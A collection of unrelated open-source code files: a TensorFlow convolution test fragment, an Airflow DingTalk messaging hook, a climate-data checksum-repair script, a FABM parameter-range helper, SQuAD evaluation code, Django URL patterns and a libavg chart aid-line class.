k = tf_utils.ndarange([2, 4, 4, 1])
module.conv2d_2453x2441_same_stride_1(i, k)
self.compare_backends(batched_feature_padded_same_stride_1_output_1,
self._modules)
# yapf: enable
def main(argv):
del argv # Unused
if hasattr(tf, 'enable_v2_behavior'):
tf.enable_v2_behavior()
tf.test.main()
if __name__ == '__main__':
app.run(main)
|
the-stack_0_25322
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
from typing import List, Optional, Union
import requests
from requests import Session
from airflow.exceptions import AirflowException
from airflow.providers.http.hooks.http import HttpHook
class DingdingHook(HttpHook):
"""
This hook allows you send Dingding message using Dingding custom bot.
Get Dingding token from conn_id.password. And prefer set domain to
conn_id.host, if not will use default ``https://oapi.dingtalk.com``.
For more detail message in
`Dingding custom bot <https://open-doc.dingtalk.com/microapp/serverapi2/qf2nxq>`_
:param dingding_conn_id: The name of the Dingding connection to use
:type dingding_conn_id: str
:param message_type: Message type you want to send to Dingding, support five type so far
including text, link, markdown, actionCard, feedCard
:type message_type: str
:param message: The message send to Dingding chat group
:type message: str or dict
:param at_mobiles: Remind specific users with this message
:type at_mobiles: list[str]
:param at_all: Remind all people in group or not. If True, will overwrite ``at_mobiles``
:type at_all: bool
"""
conn_name_attr = 'dingding_conn_id'
default_conn_name = 'dingding_default'
conn_type = 'dingding'
hook_name = 'Dingding'
def __init__(
self,
dingding_conn_id='dingding_default',
message_type: str = 'text',
message: Optional[Union[str, dict]] = None,
at_mobiles: Optional[List[str]] = None,
at_all: bool = False,
*args,
**kwargs,
) -> None:
super().__init__(http_conn_id=dingding_conn_id, *args, **kwargs) # type: ignore[misc]
self.message_type = message_type
self.message = message
self.at_mobiles = at_mobiles
self.at_all = at_all
def _get_endpoint(self) -> str:
"""Get Dingding endpoint for sending message."""
conn = self.get_connection(self.http_conn_id)
token = conn.password
if not token:
raise AirflowException(
'Dingding token is requests but get nothing, check you conn_id configuration.'
)
return f'robot/send?access_token={token}'
def _build_message(self) -> str:
"""
Build different type of Dingding message
As most commonly used type, text message just need post message content
rather than a dict like ``{'content': 'message'}``
"""
if self.message_type in ['text', 'markdown']:
data = {
'msgtype': self.message_type,
self.message_type: {'content': self.message} if self.message_type == 'text' else self.message,
'at': {'atMobiles': self.at_mobiles, 'isAtAll': self.at_all},
}
else:
data = {'msgtype': self.message_type, self.message_type: self.message}
return json.dumps(data)
def get_conn(self, headers: Optional[dict] = None) -> Session:
"""
Overwrite HttpHook get_conn because just need base_url and headers and
not don't need generic params
:param headers: additional headers to be passed through as a dictionary
:type headers: dict
"""
conn = self.get_connection(self.http_conn_id)
self.base_url = conn.host if conn.host else 'https://oapi.dingtalk.com'
session = requests.Session()
if headers:
session.headers.update(headers)
return session
def send(self) -> None:
"""Send Dingding message"""
support_type = ['text', 'link', 'markdown', 'actionCard', 'feedCard']
if self.message_type not in support_type:
raise ValueError(
'DingdingWebhookHook only support {} '
'so far, but receive {}'.format(support_type, self.message_type)
)
data = self._build_message()
self.log.info('Sending Dingding type %s message %s', self.message_type, data)
resp = self.run(
endpoint=self._get_endpoint(), data=data, headers={'Content-Type': 'application/json'}
)
# Dingding success send message will with errcode equal to 0
if int(resp.json().get('errcode')) != 0:
raise AirflowException(f'Send Dingding message failed, receive error message {resp.text}')
self.log.info('Success Send Dingding message')
|
the-stack_0_25323
|
#!/usr/bin/env python
"""
update_dreqs_0321.py
Check the checksums of files in the selected dataset and remove from disk any
that don't match so that they can be restored again.
"""
import argparse
import logging.config
import os
import sys
import django
django.setup()
from pdata_app.models import DataFile, DataRequest, Settings # nopep8
from pdata_app.utils.common import adler32, delete_files # nopep8
__version__ = '0.1.0b1'
logger = logging.getLogger(__name__)
# The top-level directory to write output data to
BASE_OUTPUT_DIR = Settings.get_solo().base_output_dir
def parse_args():
"""
Parse command-line arguments
"""
parser = argparse.ArgumentParser(description='Update filename')
parser.add_argument('-l', '--log-level',
help='set logging level (default: %(default)s)',
choices=['debug', 'info', 'warning', 'error'],
default='warning')
parser.add_argument('request_id', help='to request id to update')
parser.add_argument('--version', action='version',
version='%(prog)s {}'.format(__version__))
args = parser.parse_args()
return args
def main(args):
"""
Main entry point
"""
model, expt, var_lab, table, var = args.request_id.split('_')
dreq = DataRequest.objects.get(
climate_model__short_name=model,
experiment__short_name=expt,
rip_code=var_lab,
variable_request__table_name=table,
variable_request__cmor_name=var
)
logger.debug('DataRequest is {}'.format(dreq))
logger.debug('Checking checksums')
checksum_mismatch = 0
for data_file in dreq.datafile_set.order_by('name'):
logger.debug('Checking {}'.format(data_file.name))
full_path = os.path.join(data_file.directory, data_file.name)
actual = adler32(full_path)
expected = data_file.checksum_set.first().checksum_value
if actual != expected:
logger.error(f'Checksum mismatch for {full_path}')
checksum_mismatch += 1
dfs = DataFile.objects.filter(name=data_file.name)
if dfs.count() != 1:
logger.error(f'Unable to select file for deletion {full_path}')
else:
delete_files(dfs.all(), BASE_OUTPUT_DIR)
if checksum_mismatch:
logger.error(f'Exiting due to {checksum_mismatch} checksum failures.')
logger.error(f'Data request is in {dreq.directories()}')
sys.exit(1)
if __name__ == "__main__":
cmd_args = parse_args()
# determine the log level
log_level = getattr(logging, cmd_args.log_level.upper())
# configure the logger
logging.config.dictConfig({
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': '%(levelname)s: %(message)s',
},
},
'handlers': {
'default': {
'level': log_level,
'class': 'logging.StreamHandler',
'formatter': 'standard'
},
},
'loggers': {
'': {
'handlers': ['default'],
'level': log_level,
'propagate': True
}
}
})
# run the code
main(cmd_args)
|
the-stack_0_25324
|
import argparse
import yaml
parser = argparse.ArgumentParser()
parser.add_argument('fabm_yaml')
parser.add_argument('--scale', type=float, default=0.3)
args = parser.parse_args()
with open(args.fabm_yaml) as f:
y = yaml.safe_load(f)
for name, info in y['instances'].items():
parameters = info.get('parameters', {})
if not parameters:
continue
for parameter, value in parameters.items():
path = 'instances/%s/parameters/%s' % (name, parameter)
if isinstance(value, (float, int)) and not isinstance(value, bool):
l, r = (1 - args.scale) * value, (1 + args.scale) * value
if r < l:
l, r = r, l
xml = '<parameter file="fabm.yaml" variable="%s" minimum="%s" maximum="%s" />' % (path, l, r)
if isinstance(value, int):
xml = '<!-- %s -->' % xml
print(xml)
|
the-stack_0_25326
|
# coding=utf-8
# Copyright 2018 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""SQuAD evaluation."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import json
import re
import string
import numpy as np
import tensorflow as tf
from qanet.util import misc_util
__all__ = ["evaluate", "load_ground_truths", "load_predictions",
"evaluate_scores", "compute_f1", "compute_exact",
"get_start_end"]
def evaluate(groundtruth_file, prediction_file, data_format="squad"):
"""Evaluate SQUAD predictions given files."""
ground_truths, _ = load_ground_truths(groundtruth_file)
predictions, _, _ = load_predictions(prediction_file)
scores, f1_scores, exact_scores = evaluate_scores(ground_truths, predictions)
# SQuAD 2.0: get some more statistics over answers and no-answers
if data_format == "squad2":
has_ans_qids = [k for k, v in ground_truths.items() if v]
no_ans_qids = [k for k, v in ground_truths.items() if not v]
if has_ans_qids:
has_ans_scores = _make_eval_dict(f1_scores, exact_scores,
qid_list=has_ans_qids)
_merge_eval(scores, has_ans_scores, "HasAns")
if no_ans_qids:
no_ans_scores = _make_eval_dict(f1_scores, exact_scores,
qid_list=no_ans_qids)
_merge_eval(scores, no_ans_scores, "NoAns")
return scores
def load_ground_truths(groundtruth_file):
"""Load ground truth data."""
print("# Loading ground truths from %s" % groundtruth_file)
with tf.gfile.Open(groundtruth_file) as f:
dataset_json = json.load(f)
dataset = dataset_json["data"]
# get ground truths
ground_truths = {}
questions = {}
num_examples = 0
num_paragraphs = 0
for article in dataset:
for paragraph in article["paragraphs"]:
num_paragraphs += 1
# Answers
for qa in paragraph["qas"]:
if qa["id"] in ground_truths:
message = "Duplicated id " + qa["id"] + "."
tf.logging.info(message)
continue
ground_truths[qa["id"]] = list(
map(lambda x: x["text"], qa["answers"]))
questions[qa["id"]] = qa["question"]
num_examples += 1
tf.logging.info(" Num ground truths: %d" % num_examples)
tf.logging.info(" Num paragraphs: %d" % num_paragraphs)
return ground_truths, questions
def load_predictions(prediction_file, load_prob=False):
"""Load predictions from a prediction file."""
print("# Loading predictions from %s" % prediction_file)
num_examples = 0
predictions = {}
if load_prob:
start_prob, end_prob = {}, {}
else:
start_prob, end_prob = None, None
with tf.gfile.GFile(prediction_file) as f:
data = json.load(f)
for q_id in data:
if not isinstance(data[q_id], dict):
predictions[q_id] = data[q_id]
else:
predictions[q_id] = data[q_id]["answer"]
if load_prob:
start_prob[q_id] = np.array(data[q_id]["start_prob"])
end_prob[q_id] = np.array(data[q_id]["end_prob"])
num_examples += 1
tf.logging.info(" Num predictions: %d" % num_examples)
return predictions, start_prob, end_prob
def _make_eval_dict(f1_scores, exact_scores, qid_list=None):
"""Compute aggregated F1 and exact match scores."""
# Filter scores if qid_list is specified
if qid_list:
f1_scores_select = {}
exact_scores_select = {}
for qid in qid_list:
if qid in f1_scores and exact_scores:
f1_scores_select[qid] = f1_scores[qid]
exact_scores_select[qid] = exact_scores[qid]
else:
tf.logging.info("missing qid %s" % qid)
else:
f1_scores_select = f1_scores
exact_scores_select = exact_scores
# Compute scores
total = len(exact_scores_select)
return collections.OrderedDict([
("exact_match", 100.0 * sum(exact_scores_select.values()) / total),
("f1", 100.0 * sum(f1_scores_select.values()) / total),
("total", total),
])
def _merge_eval(main_eval, new_eval, prefix):
"""Merge evaluation dicts."""
for k in new_eval:
main_eval["%s_%s" % (prefix, k)] = new_eval[k]
def _normalize_answer(s):
"""Lower text and remove punctuation, articles and extra whitespace."""
def remove_articles(text):
return re.sub(r"\b(a|an|the)\b", " ", text)
def white_space_fix(text):
return " ".join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return "".join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def _handle_no_answer(prediction, ground_truths):
"""Check if there is no groundtruth answer and compute no-answer score."""
score = None
# Check for no-answer: ground_truths can look like ['', '', '']
# the reason there are multiple empty values because we operate at batch
# and append '' to the maximum number of answers.
has_answer = False
if ground_truths:
for answer in ground_truths:
if answer:
has_answer = True
break
if not has_answer: # No groundtruth answer
if _normalize_answer(prediction): # predict answer
score = 0.0
else:
score = 1.0
return score
def _f1_score(prediction, ground_truth):
"""Compute F1 score."""
prediction_tokens = _normalize_answer(prediction).split()
ground_truth_tokens = _normalize_answer(ground_truth).split()
common = (collections.Counter(prediction_tokens) &
collections.Counter(ground_truth_tokens))
num_same = sum(common.values())
if num_same == 0:
return 0
precision = 1.0 * num_same / len(prediction_tokens)
recall = 1.0 * num_same / len(ground_truth_tokens)
f1 = (2 * precision * recall) / (precision + recall)
return f1
def _em_score(prediction, ground_truth):
"""Compute EM score (binary value)."""
return int(_normalize_answer(prediction) == _normalize_answer(ground_truth))
def _compute_score(score_fn, prediction, ground_truths, answer_mask, is_byte):
"""Compute scores (EM, F1, etc.) given a score function."""
# Whether we are dealing with a sequence of bytes or not
if is_byte:
prediction = prediction.decode("utf-8")
ground_truths = [gt.decode("utf-8") for gt in ground_truths]
# SQuAD 2.0
score = _handle_no_answer(prediction, ground_truths)
# Has-answer case
# NOTE(thangluong): score can be 0.0 so we need to explicitly compare to None
if score is None:
# Execute over multiple answers
scores = [score_fn(prediction, gt) for gt in ground_truths]
if answer_mask is not None: # answer_mask can be a tensor
scores = scores * answer_mask
tf.logging.info("prediction %s, ground_truths %s, scores %s" % (
prediction, str(ground_truths), str(scores)))
score = max(scores)
else:
tf.logging.info("prediction %s, ground_truths %s, score %s" % (
prediction, str(ground_truths), str(score)))
return score
def compute_f1(prediction, ground_truths, answer_mask=None, is_byte=False):
"""Compute F1 score over multiple ground truths."""
return _compute_score(
_f1_score, prediction, ground_truths, answer_mask, is_byte)
def compute_exact(prediction, ground_truths, answer_mask=None, is_byte=False):
"""Compute exact match (EM) score over multiple ground_truths."""
return _compute_score(
_em_score, prediction, ground_truths, answer_mask, is_byte)
def evaluate_scores(ground_truths, predictions, label="# Scores"):
"""Main evaluation."""
f1_scores = {}
exact_scores = {}
for q_id in ground_truths:
if q_id not in predictions:
print("Unanswered question %s will receive score 0." % q_id)
continue
pred_answer = predictions[q_id]
gold_answers = ground_truths[q_id]
# Take max over all gold answers
exact_scores[q_id] = compute_exact(pred_answer, gold_answers)
f1_scores[q_id] = compute_f1(pred_answer, gold_answers)
scores = _make_eval_dict(f1_scores, exact_scores)
tf.logging.info("%s: %s" % (label, str(scores)))
misc_util.print_out("%s: %s" % (label, str(scores)))
return scores, f1_scores, exact_scores
def _compute_prob_matrix(start_prob, end_prob, max_ans_size=25):
"""Compute span prob matrix given start and end probabilities."""
assert len(start_prob) == len(end_prob)
context_len = len(start_prob)
mask = np.triu(
np.ones([context_len, context_len]) -
np.triu(np.ones([context_len, context_len]), max_ans_size))
prob_matrix = np.outer(start_prob, end_prob)
prob_matrix *= mask
return prob_matrix
def _compute_start_end(prob_matrix):
"""Given a span prob matrix, return the best span and its probability."""
assert prob_matrix.shape[0] == prob_matrix.shape[1]
context_len = prob_matrix.shape[0]
argmax_id = np.argmax(prob_matrix)
start = argmax_id // context_len
end = argmax_id % context_len
return start, end, prob_matrix[start, end]
def get_start_end(start_prob, end_prob):
prob_matrix = _compute_prob_matrix(start_prob, end_prob)
start, end, prob = _compute_start_end(prob_matrix)
return start, end, prob
|
the-stack_0_25327
|
from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns(
'',
# Archived stats
url('^archive/(?P<slug>[^/]+)/(?P<year>\d{4})/(?P<month>\d{2})/$',
views.ArchiveListView.as_view(),
name='stats.archive_list'),
url('^archive/(?P<slug>[^/]+)/'
'(?P<year>\d{4})/(?P<month>\d{2})/(?P<day>\d{1,2})/'
'(?P<model_name>\w+)/$',
views.ArchiveView.as_view(),
name='stats.archive'),
)
|
the-stack_0_25328
|
from libavg import avg
from libavg.avg import CursorEvent
from libavg_charts.aid_lines.orthogonal_aid_line import OrthogonalAidLine
from libavg_charts.axis.chart_axis_enums import Orientation
from logging_base.study_logging import StudyLog
class DepositAidLine(OrthogonalAidLine):
ADD_AID_LINE = "addAidLine"
DELETE_AID_LINE = "deleteAidLine"
def __init__(self, **kwargs):
"""
:param kwargs: Other parameters for the base.
"""
super(DepositAidLine, self).__init__(**kwargs)
# list of tuples: tuple[horizontal_aid_line, vertical_aid_line]
self._aid_lines = []
self._horizontal_aid_lines = []
self._vertical_aid_lines = []
self._horizontal_aid_line_drag_start_pos = {}
self._vertical_aid_line_drag_start_pos = {}
self.bind(self.ADD_AID_LINE, self._on_add_aid_line)
self.bind(self.DELETE_AID_LINE, self._on_delete_aid_line)
def _on_step_forward(self, steps=1, axis_index=0):
"""
Moves the aid line a number of steps (to the ticks of the axis) forward.
:param steps: The number of steps the aid line should be move forward.
:type steps: int
:param axis_index: The index of the axis that the step should be calculated with.
:type axis_index: int
"""
pass
def _on_step_backward(self, steps=1, axis_index=0):
"""
Moves the aid line a number of steps (to the ticks of the axis) backward.
:param steps: The number of steps the aid line should be move backward.
:type steps: int
:param axis_index: The index of the axis that the step should be calculated with.
:type axis_index: int
"""
pass
def _on_add_aid_line(self, pos):
"""
Creates an aid line at the given pos.
:param pos: The pos to create a aid line on.
:type pos: tuple[float, float]
"""
if not (self._aid_line_area[0] <= pos[0] <= self._aid_line_area[2] and
self._aid_line_area[1] <= pos[1] <= self._aid_line_area[3]):
return
h_aid_line = self._draw_horizontal_aid_line(pos=pos)
v_aid_line = self._draw_vertical_aid_line(pos=pos)
if h_aid_line:
self._horizontal_aid_lines.append(h_aid_line)
if v_aid_line:
self._vertical_aid_lines.append(v_aid_line)
# Draw the intersections and the labels.
if self._intersection_config.show_intersections:
aid_line_values = {a.pos: Orientation.Horizontal for a in self._horizontal_aid_lines}
aid_line_values.update({a.pos : Orientation.Vertical for a in self._vertical_aid_lines})
intersections = self._get_intersections(
aid_line_orientations=aid_line_values.values(),
aid_line_positions=aid_line_values.keys()
)
self._remove_intersections()
self._draw_intersections(intersections=intersections)
if self._aid_line_config.show_label:
if h_aid_line:
self._draw_label(aid_line_div=h_aid_line, orientation=Orientation.Horizontal)
if v_aid_line:
self._draw_label(aid_line_div=v_aid_line, orientation=Orientation.Vertical)
StudyLog.get_instance().write_event_log('An desposite aid line was created.')
def _on_delete_aid_line(self, pos):
"""
Deletes an aid line at the pos, if an aid line lies there.
:param pos: The pos to create a aid line on.
:type pos: tuple[float, float]
"""
if not (self._aid_line_area[0] <= pos[0] <= self._aid_line_area[2] and
self._aid_line_area[1] <= pos[1] <= self._aid_line_area[3]):
return
aid_lines_to_remove = []
for i in range(len(self._horizontal_aid_lines)):
horizontal_aid_line = self._horizontal_aid_lines[i]
line_node = horizontal_aid_line.getChild(0)
aid_line_size = (
line_node.pos1[0],
horizontal_aid_line.pos[1] - line_node.strokewidth / 2,
line_node.pos2[0],
horizontal_aid_line.pos[1] + line_node.strokewidth / 2
)
if aid_line_size[0] <= pos[0] <= aid_line_size[2] and aid_line_size[1] <= pos[1] <= aid_line_size[3]:
if i not in aid_lines_to_remove:
aid_lines_to_remove.append(i)
for i in range(len(self._vertical_aid_lines)):
vertical_aid_line = self._vertical_aid_lines[i]
line_node = vertical_aid_line.getChild(0)
aid_line_size = (
vertical_aid_line.pos[0] - line_node.strokewidth / 2,
line_node.pos1[1],
vertical_aid_line.pos[0] + line_node.strokewidth / 2,
line_node.pos2[1]
)
if aid_line_size[0] <= pos[0] <= aid_line_size[2] and aid_line_size[1] <= pos[1] <= aid_line_size[3]:
if i not in aid_lines_to_remove:
aid_lines_to_remove.append(i)
removed = 0
for i in aid_lines_to_remove:
i -= removed
yet_removed = 0
if 0 <= i < len(self._horizontal_aid_lines):
yet_removed = 1
self._horizontal_aid_lines.pop(i).unlink(True)
if i < len(self._vertical_aid_lines):
yet_removed = 1
self._vertical_aid_lines.pop(i).unlink(True)
removed -= yet_removed
if self._intersection_config.show_intersections:
self._remove_intersections()
aid_line_values = {a.pos: Orientation.Horizontal for a in self._horizontal_aid_lines}
aid_line_values.update({a.pos : Orientation.Vertical for a in self._vertical_aid_lines})
self._draw_intersections(self._get_intersections(
aid_line_orientations=aid_line_values.values(),
aid_line_positions=aid_line_values.keys()
))
StudyLog.get_instance().write_event_log('An desposite aid line was deleted.')
def _draw_horizontal_aid_line(self, pos, with_outer=True):
"""
Draws a horizontal aid line.
:param pos: The position of the cursor.
:type pos: tuple[float, float]
:param with_outer: If the outer part of the line should be drawn.
:type with_outer: bool
:return: The created aid line.
:rtype: InteractiveDivNode
"""
aid_line = super(DepositAidLine, self)._draw_horizontal_aid_line(pos, with_outer)
aid_line.subscribe(avg.Node.CURSOR_DOWN, self._on_aid_line_cursor_down)
aid_line.start_listening(
drag_started=self._on_aid_line_drag_started,
dragged=self._on_aid_line_drag,
drag_ended=self._on_aid_line_drag_end
)
return aid_line
def _draw_vertical_aid_line(self, pos, with_outer=True):
"""
Draws a vertical aid line.
:param pos: The position of the cursor.
:type pos: tuple[float, float]
:param with_outer: If the outer part of the line should be drawn.
:type with_outer: bool
:return: The created aid line.
:rtype: InteractiveDivNode
"""
aid_line = super(DepositAidLine, self)._draw_vertical_aid_line(pos, with_outer)
aid_line.subscribe(avg.Node.CURSOR_DOWN, self._on_aid_line_cursor_down)
aid_line.start_listening(
drag_started=self._on_aid_line_drag_started,
dragged=self._on_aid_line_drag,
drag_ended=self._on_aid_line_drag_end
)
return aid_line
def _on_aid_line_cursor_down(self, event):
"""
Called if a drag on an aid line has started.
:type event: CursorEvent
"""
sender = event.node
if sender in self._horizontal_aid_lines:
index = self._horizontal_aid_lines.index(sender)
else: # sender in self._vertical_aid_lines:
index = self._vertical_aid_lines.index(sender)
rel_event_pos = self._chart.getRelPos(event.pos)
if index < len(self._horizontal_aid_lines) and index not in self._horizontal_aid_line_drag_start_pos:
self._horizontal_aid_line_drag_start_pos[index] = 0, rel_event_pos[1]
if index < len(self._vertical_aid_lines) and index not in self._vertical_aid_line_drag_start_pos:
self._vertical_aid_line_drag_start_pos[index] = rel_event_pos[0], 0
def _on_aid_line_drag_started(self, sender):
"""
Called when a drag on an axis has started.
:type sender: InteractiveDivNode
"""
if sender in self._horizontal_aid_lines:
index = self._horizontal_aid_lines.index(sender)
else: # sender in self._vertical_aid_lines:
index = self._vertical_aid_lines.index(sender)
if index < len(self._horizontal_aid_lines) and index in self._horizontal_aid_line_drag_start_pos:
self._horizontal_aid_lines[index].pos = self._horizontal_aid_line_drag_start_pos[index]
self._horizontal_aid_lines[index].drag_start_pos = self._horizontal_aid_line_drag_start_pos[index]
if index < len(self._vertical_aid_lines) and index in self._vertical_aid_line_drag_start_pos:
self._vertical_aid_lines[index].pos = self._vertical_aid_line_drag_start_pos[index]
self._vertical_aid_lines[index].drag_start_pos = self._vertical_aid_line_drag_start_pos[index]
def _on_aid_line_drag(self, sender, pos_change):
"""
Called if an aid line was dragged.
:param pos_change: The offset from the last pos.
:type pos_change: tuple[float, float]
"""
if sender in self._horizontal_aid_lines:
index = self._horizontal_aid_lines.index(sender)
pos_change = self._horizontal_aid_lines[index].last_absolute_drag_offset
else: # sender in self._vertical_aid_lines:
index = self._vertical_aid_lines.index(sender)
pos_change = self._vertical_aid_lines[index].last_absolute_drag_offset
if index < len(self._horizontal_aid_lines):
new_pos = self._check_for_snapping(
pos=(self._horizontal_aid_lines[index].pos[0], self._horizontal_aid_lines[index].drag_start_pos[1] + pos_change[1]),
orientation=Orientation.Horizontal
)
pos, _ = self._check_aid_line_pos(aid_line_pos=new_pos, orientation=Orientation.Horizontal)
self._horizontal_aid_lines[index].pos = pos or new_pos
if self._aid_line_config.show_label:
self._draw_label(aid_line_div=self._horizontal_aid_lines[index], orientation=Orientation.Horizontal)
if index < len(self._vertical_aid_lines):
new_pos = self._check_for_snapping(
pos=(self._vertical_aid_lines[index].drag_start_pos[0] + pos_change[0], self._vertical_aid_lines[index].pos[1]),
orientation=Orientation.Vertical
)
pos, _ = self._check_aid_line_pos(aid_line_pos=new_pos, orientation=Orientation.Vertical)
self._vertical_aid_lines[index].pos = pos or new_pos
if self._aid_line_config.show_label:
self._draw_label(aid_line_div=self._vertical_aid_lines[index], orientation=Orientation.Vertical)
aid_line_values = {a.pos: Orientation.Horizontal for a in self._horizontal_aid_lines}
aid_line_values.update({a.pos : Orientation.Vertical for a in self._vertical_aid_lines})
intersections = self._get_intersections(
aid_line_orientations=aid_line_values.values(),
aid_line_positions=aid_line_values.keys()
)
self._remove_intersections()
self._draw_intersections(intersections=intersections)
def _on_aid_line_drag_end(self, sender, pos_change):
"""
Called when a drag on an axis has ended.
:type sender: InteractiveDivNode
:type pos_change: tuple[float, float]
"""
self._on_aid_line_drag(sender=sender, pos_change=pos_change)
if sender in self._horizontal_aid_lines:
index = self._horizontal_aid_lines.index(sender)
else: # sender in self._vertical_aid_lines:
index = self._vertical_aid_lines.index(sender)
if index < len(self._horizontal_aid_lines) and index in self._horizontal_aid_line_drag_start_pos:
self._horizontal_aid_line_drag_start_pos.pop(index)
if index < len(self._vertical_aid_lines) and index in self._vertical_aid_line_drag_start_pos:
self._vertical_aid_line_drag_start_pos.pop(index)
orientation = Orientation.Horizontal if sender in self._horizontal_aid_lines else Orientation.Vertical
new_pos, in_border_area = self._check_aid_line_pos(sender.pos, orientation)
if in_border_area:
if orientation is Orientation.Horizontal:
self._on_delete_aid_line((self._aid_line_area[0] + (self._aid_line_area[2] - self._aid_line_area[0]) / 2, sender.pos[1]))
else:
self._on_delete_aid_line((sender.pos[0], self._aid_line_area[1] + (self._aid_line_area[3] - self._aid_line_area[1]) / 2))
def reset(self):
"""
Resets this aid line controller.
"""
for aid_line in self._horizontal_aid_lines:
aid_line.unlink(True)
for aid_line in self._vertical_aid_lines:
aid_line.unlink(True)
self._horizontal_aid_lines = []
self._vertical_aid_lines = []
self._remove_intersections()
def _on_selection_set_changed(self, sender, selection_set_id, selection_diff):
"""
Called when a selection in the chart has been changed.
:type sender: SelectionDataHolder
:param selection_set_id: The id of the selection set that was changed.
:type selection_set_id: str
:param selection_diff: The changed sub set.
:type selection_diff: list
:return: Was the given set removed? And all the data objects that are affected.
:rtype: tuple[bool, dict[str, DataObjects]]
"""
removed, data_objects = super(DepositAidLine, self)._on_selection_set_changed(sender, selection_set_id, selection_diff)
if not removed:
return
aid_line_values = {a.pos: Orientation.Horizontal for a in self._horizontal_aid_lines}
aid_line_values.update({a.pos : Orientation.Vertical for a in self._vertical_aid_lines})
intersections = self._get_intersections(
aid_line_orientations=aid_line_values.values(),
aid_line_positions=aid_line_values.keys(),
data_object_nodes={k: self._chart.data_object_nodes[k] for k, do in self._chart.data_objects.iteritems() if k in data_objects}
)
self._draw_intersections(intersections=intersections)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.